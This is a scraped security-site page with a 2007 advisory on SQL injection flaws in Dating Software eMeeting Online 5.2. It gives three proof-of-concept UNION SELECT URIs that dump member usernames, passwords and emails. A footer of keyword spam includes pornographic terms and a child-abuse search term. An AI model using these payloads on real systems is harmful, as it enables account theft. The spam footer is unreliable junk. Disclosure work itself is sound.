exploits , vulnerabilities , articles , Dating Software eMeeting Online Multiple SQL Injection Vulnerabilities

Title	Dating Software eMeeting Online Multiple SQL Injection Vulnerabilities
Published	2007-07-05-12:00AM
Updated	2007-07-06-10:07PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	t0pP8uZz & xprog is credited with the discovery of these vulnerabilities.
Vulnerable	Dating Software eMeeting Online 5.2
Not Vulnerable
Code	Attackers can use a browser to exploit these issues.The following proof-of-concept URIs are available:http://www.example.com/b.php?id=-1//UNION//ALL//SELECT//1,2,3,concat(username,0x3a,password),5,6,7,8,9,10//from//members/* http://www.example.com/b.php?id=-1//UNION//ALL//SELECT//1,2,3,concat(username,0x3a,password),5,6,7,8,9,10//from//members//where//username=0x61646D696E/* http://www.example.com/account/gallery.php?p=gal&id=-1//UNION//ALL//SELECT//null,null,null,concat(0x273e3c2f74643e,username,0x3a,password,0x3a,email,0x3c62723e3c2f2f),null,null//from//members/*
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-18 ReVou Comment Field HTML Injection Vulnerability
2009-12-18 Adobe Flash Media Server Resource Exhaustion Remote Denial of Service Vulnerability
2009-12-18 Centreon Authentication Mechanism Security Bypass Vulnerability
2009-12-18 Family Connections Multiple Input Validation Vulnerabilities
2009-12-18 Drupal Contact and Menu Modules Multiple HTML Injection Vulnerabilities
2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities
2009-12-17 Winamp JPEG and PNG Multiple Integer Overflow Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 01:22:52 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Cewek tela tamil sex ass guru all video www.xlx.co dmoz.im call girls sexydesi.n sexe photo Crack Data WWW.GIRL.C www.bollyw news for c Vidio Sex waptrickse trisha.sex Www.snurff Invision 2 port 1026 www.taobao mambo Remo timekiller lo773l www.witon. sexbhabhi dxs.lelecy explorer c ddos irc dmoz.im Arabec maxcpm.inf linux 2.6. www.606688 mambo Remo couck Free sex w 0769xipen. news for c cc.txt AllMyGuest call girl Invision P mambo 4.5. ONESEARCH. caipiaow.n news for c news for c kid porn cagri 200 /compo